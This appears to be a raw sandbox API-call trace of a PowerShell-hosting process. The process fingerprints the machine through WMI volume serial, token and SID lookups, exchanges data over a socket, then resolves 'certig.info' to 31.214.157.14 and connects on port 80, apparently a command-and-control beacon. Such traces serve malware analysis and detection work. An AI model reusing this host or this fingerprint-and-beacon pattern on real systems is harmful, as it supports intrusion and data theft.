	[0245.752] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__PATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64a04*=0, plFlavor=0x2e64a08*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2e64a04*=8, plFlavor=0x2e64a08*=64) returned 0x0
	[0245.752] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae994 | out: puCount=0x5eae994*=0x2) returned 0x0
	[0245.752] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae990*=0x0, pszText=0x0 | out: puBuffLength=0x5eae990*=0x17, pszText=0x0) returned 0x0
	[0245.752] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae990*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae990*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.752] IWbemClassObject:Get (in: This=0x626d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5eae950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64b58*=0, plFlavor=0x2e64b5c*=0 | out: pVal=0x5eae950*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2e64b58*=19, plFlavor=0x2e64b5c*=0) returned 0x0
	[0245.752] IWbemClassObject:Get (in: This=0x626d4a0, wszName="SerialNumber", lFlags=0, pVal=0x5eaea08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64b58*=19, plFlavor=0x2e64b5c*=0 | out: pVal=0x5eaea08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x2e64b58*=19, plFlavor=0x2e64b5c*=0) returned 0x0
	[0246.324] GetCurrentProcess () returned 0xffffffff
	[0246.324] GetLastError () returned 0x3f0
	[0246.324] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae8a8 | out: TokenHandle=0x5eae8a8*=0x4c8) returned 1
	[0246.324] GetLastError () returned 0x3f0
	[0246.336] GetCurrentProcess () returned 0xffffffff
	[0246.336] GetLastError () returned 0x3f0
	[0246.336] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae99c | out: TokenHandle=0x5eae99c*=0x4cc) returned 1
	[0246.337] GetLastError () returned 0x3f0
	[0246.337] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5eaea44 | out: TokenInformation=0x0, ReturnLength=0x5eaea44) returned 0
	[0246.337] GetLastError () returned 0x7a
	[0246.337] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x3accf0
	[0246.337] GetLastError () returned 0x7a
	[0246.337] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x3accf0, TokenInformationLength=0x24, ReturnLength=0x5eaea44 | out: TokenInformation=0x3accf0, ReturnLength=0x5eaea44) returned 1
	[0246.337] GetLastError () returned 0x7a
	[0246.339] LocalFree (hMem=0x3accf0) returned 0x0
	[0246.339] GetLastError () returned 0x7f
	[0246.378] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x5eae910, DesiredAccess=0x800, PolicyHandle=0x5eae8b8 | out: PolicyHandle=0x5eae8b8) returned 0x0
	[0246.379] GetLastError () returned 0x0
	[0246.382] LsaLookupSids (in: PolicyHandle=0x39c7b0, Count=0x1, Sids=0x2e7bedc*=0x2e7be7c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x5eae8e0, Names=0x5eae8d4 | out: ReferencedDomains=0x5eae8e0, Names=0x5eae8d4) returned 0x0
	[0246.382] GetLastError () returned 0x0
	[0246.383] LsaClose (ObjectHandle=0x39c7b0) returned 0x0
	[0246.383] GetLastError () returned 0x0
	[0246.383] LsaFreeMemory (Buffer=0x387390) returned 0x0
	[0246.383] GetLastError () returned 0x0
	[0246.383] LsaFreeMemory (Buffer=0x3b10a8) returned 0x0
	[0246.383] GetLastError () returned 0x0
	[0246.401] send (s=0x420, buf=0x2e7e218*, len=121, flags=0) returned 121
	[0246.401] GetLastError () returned 0x0
	[0246.408] recv (in: s=0x420, buf=0x2dddbe4, len=502, flags=0 | out: buf=0x2dddbe4*) returned 502
	[0246.408] GetLastError () returned 0x0
	[0246.410] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0246.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.413] GetLastError () returned 0x0
	[0246.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.414] GetLastError () returned 0x0
	[0246.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.414] GetLastError () returned 0x0
	[0246.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.414] GetLastError () returned 0x0
	[0246.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.510] GetLastError () returned 0xcb
	[0246.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.580] GetLastError () returned 0x0
	[0246.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.581] GetLastError () returned 0x0
	[0246.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.581] GetLastError () returned 0x0
	[0246.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.581] GetLastError () returned 0x0
	[0247.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.540] GetLastError () returned 0xcb
	[0247.666] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4e4
	[0247.699] GetLastError () returned 0x0
	[0257.730] CloseHandle (hObject=0x4e4) returned 1
	[0257.730] GetLastError () returned 0x0
	[0257.746] shutdown (s=0x420, how=2) returned 0
	[0257.747] GetLastError () returned 0x0
	[0257.748] closesocket (s=0x420) returned 0
	[0257.748] GetLastError () returned 0x0
	[0257.888] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5eae880*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5eae614 | out: ppResult=0x5eae614*=0x3ac5c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x398fb8*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0257.965] GetLastError () returned 0x0
	[0257.966] FreeAddrInfoW (pAddrInfo=0x3ac5c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰Ս芟⺼", ai_addr=0x398fb8*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0257.966] GetLastError () returned 0x0
	[0257.966] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0257.966] GetLastError () returned 0x0
	[0257.966] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0257.966] GetLastError () returned 0x0
	[0257.966] WSAConnect (in: s=0x420, name=0x2eef124*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0258.202] GetLastError () returned 0x0
	[0258.202] closesocket (s=0x4e4) returned 0
	[0258.203] GetLastError () returned 0x0
	[0258.355] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 117
	[0258.355] GetLastError () returned 0x0
	[0258.362] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0258.434] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8dc | out: ppv=0x5eae8dc*=0x2d8dec) returned 0x0
	[0258.435] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8d4 | out: pAptType=0x5eae8d4*=1) returned 0x0
	[0258.435] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8d8 | out: ppvObject=0x5eae8d8*=0x0) returned 0x80004002
	[0258.435] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0258.449] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3f4 | out: ppv=0x5eae3f4*=0x6260bf0) returned 0x0
	[0258.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae224 | out: ppvObject=0x5eae224*=0x0) returned 0x80004002
	[0258.449] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6260bf0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae25c | out: ppvObject=0x5eae25c*=0x626d3d8) returned 0x0
	[0258.450] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae000 | out: ppvObject=0x5eae000*=0x626d3d8) returned 0x0
	[0258.450] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfbc | out: ppvObject=0x5eadfbc*=0x0) returned 0x80004002
	[0258.450] WbemDefPath:IUnknown:AddRef (This=0x626d3d8) returned 0x3
	[0258.451] CoGetContextToken (in: pToken=0x5eade48 | out: pToken=0x5eade48) returned 0x0
	[0258.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade30 | out: ppvObject=0x5eade30*=0x39b758) returned 0x0
	[0258.451] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x39b758, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade38 | out: pCid=0x5eade38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.451] WbemDefPath:IUnknown:Release (This=0x39b758) returned 0x3
	[0258.451] CoGetContextToken (in: pToken=0x5eade40 | out: pToken=0x5eade40) returned 0x0
	[0258.451] WbemDefPath:IUnknown:AddRef (This=0x626d3d8) returned 0x4
	[0258.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadeb4 | out: ppvObject=0x5eadeb4*=0x0) returned 0x80004002
	[0258.451] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x3
	[0258.452] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x2
	[0258.452] WbemDefPath:IUnknown:Release (This=0x6260bf0) returned 0x0
	[0258.452] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x1
	[0258.452] CoGetContextToken (in: pToken=0x5eae6f0 | out: pToken=0x5eae6f0) returned 0x0
	[0258.452] CoGetContextToken (in: pToken=0x5eae6b0 | out: pToken=0x5eae6b0) returned 0x0
	[0258.452] WbemDefPath:IUnknown:AddRef (This=0x626d3d8) returned 0x2
	[0258.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x5eae72c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae728 | out: ppvObject=0x5eae728*=0x626d3d8) returned 0x0
	[0258.452] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x2
	[0258.453] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x1
	[0258.453] CoGetContextToken (in: pToken=0x5eae770 | out: pToken=0x5eae770) returned 0x0
	[0258.453] CoGetContextToken (in: pToken=0x5eae730 | out: pToken=0x5eae730) returned 0x0
	[0258.453] WbemDefPath:IUnknown:AddRef (This=0x626d3d8) returned 0x2
	[0258.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d3d8, riid=0x5eae7ac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae7a8 | out: ppvObject=0x5eae7a8*=0x626d3d8) returned 0x0
	[0258.453] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x2
	[0258.453] WbemDefPath:IUnknown:AddRef (This=0x626d3d8) returned 0x3
	[0258.453] WbemDefPath:IWbemPath:SetText (This=0x626d3d8, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.453] WbemDefPath:IUnknown:Release (This=0x626d3d8) returned 0x2
	[0258.454] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae914 | out: puCount=0x5eae914*=0x2) returned 0x0
	[0258.454] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae910*=0x0, pszText=0x0 | out: puBuffLength=0x5eae910*=0x17, pszText=0x0) returned 0x0
	[0258.454] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae910*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae910*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.454] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae910 | out: puCount=0x5eae910*=0x2) returned 0x0
	[0258.454] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae90c*=0x0, pszText=0x0 | out: puBuffLength=0x5eae90c*=0x17, pszText=0x0) returned 0x0
	[0258.454] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae90c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae90c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.454] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae88c | out: ppv=0x5eae88c*=0x2d8dec) returned 0x0
	[0258.454] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae884 | out: pAptType=0x5eae884*=1) returned 0x0
	[0258.454] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae888 | out: ppvObject=0x5eae888*=0x0) returned 0x80004002
	[0258.454] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0258.454] CoGetClassObject (in: rclsid=0x382364*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae6dc | out: ppv=0x5eae6dc*=0x626da10) returned 0x0
	[0258.455] WbemLocator:IUnknown:QueryInterface (in: This=0x626da10, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae50c | out: ppvObject=0x5eae50c*=0x0) returned 0x80004002
	[0258.455] WbemLocator:IClassFactory:CreateInstance (in: This=0x626da10, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x6260bf0) returned 0x0
	[0258.455] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2e8 | out: ppvObject=0x5eae2e8*=0x6260bf0) returned 0x0
	[0258.455] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eae2a4 | out: ppvObject=0x5eae2a4*=0x0) returned 0x80004002
	[0258.456] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x3
	[0258.456] CoGetContextToken (in: pToken=0x5eae130 | out: pToken=0x5eae130) returned 0x0
	[0258.456] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae118 | out: ppvObject=0x5eae118*=0x0) returned 0x80004002
	[0258.456] CoGetContextToken (in: pToken=0x5eae128 | out: pToken=0x5eae128) returned 0x0
	[0258.456] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x4
	[0258.456] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae19c | out: ppvObject=0x5eae19c*=0x0) returned 0x80004002
	[0258.456] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x3
	[0258.456] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x2
	[0258.456] WbemLocator:IUnknown:Release (This=0x626da10) returned 0x0
	[0258.457] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x1
	[0258.457] CoGetContextToken (in: pToken=0x5eae634 | out: pToken=0x5eae634) returned 0x0
	[0258.457] CoGetContextToken (in: pToken=0x5eae5f4 | out: pToken=0x5eae5f4) returned 0x0
	[0258.457] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x2
	[0258.457] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x5eae670*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eae66c | out: ppvObject=0x5eae66c*=0x6260bf0) returned 0x0
	[0258.457] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x2
	[0258.457] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x1
	[0258.457] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae864 | out: puCount=0x5eae864*=0x2) returned 0x0
	[0258.457] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=8, puBuffLength=0x5eae860*=0x0, pszText=0x0 | out: puBuffLength=0x5eae860*=0x17, pszText=0x0) returned 0x0
	[0258.457] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=8, puBuffLength=0x5eae860*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae860*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.458] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5eae33c | out: ppv=0x5eae33c*=0x626cb70) returned 0x0
	[0258.458] WbemLocator:IWbemLocator:ConnectServer (in: This=0x626cb70, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5eae388 | out: ppNamespace=0x5eae388*=0x626de2c) returned 0x0
	[0258.565] WbemLocator:IUnknown:QueryInterface (in: This=0x626de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae258 | out: ppvObject=0x5eae258*=0x3ae65c) returned 0x0
	[0258.566] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3ae65c, pProxy=0x626de2c, pAuthnSvc=0x5eae2a0, pAuthzSvc=0x5eae29c, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4, pImpLevel=0x5eae290, pAuthInfo=0x5eae294, pCapabilites=0x5eae298 | out: pAuthnSvc=0x5eae2a0*=0xa, pAuthzSvc=0x5eae29c*=0x0, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4*=0x6, pImpLevel=0x5eae290*=0x2, pAuthInfo=0x5eae294, pCapabilites=0x5eae298*=0x1) returned 0x0
	[0258.566] WbemLocator:IUnknown:Release (This=0x3ae65c) returned 0x1
	[0258.566] WbemLocator:IUnknown:QueryInterface (in: This=0x626de2c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae24c | out: ppvObject=0x5eae24c*=0x3ae67c) returned 0x0
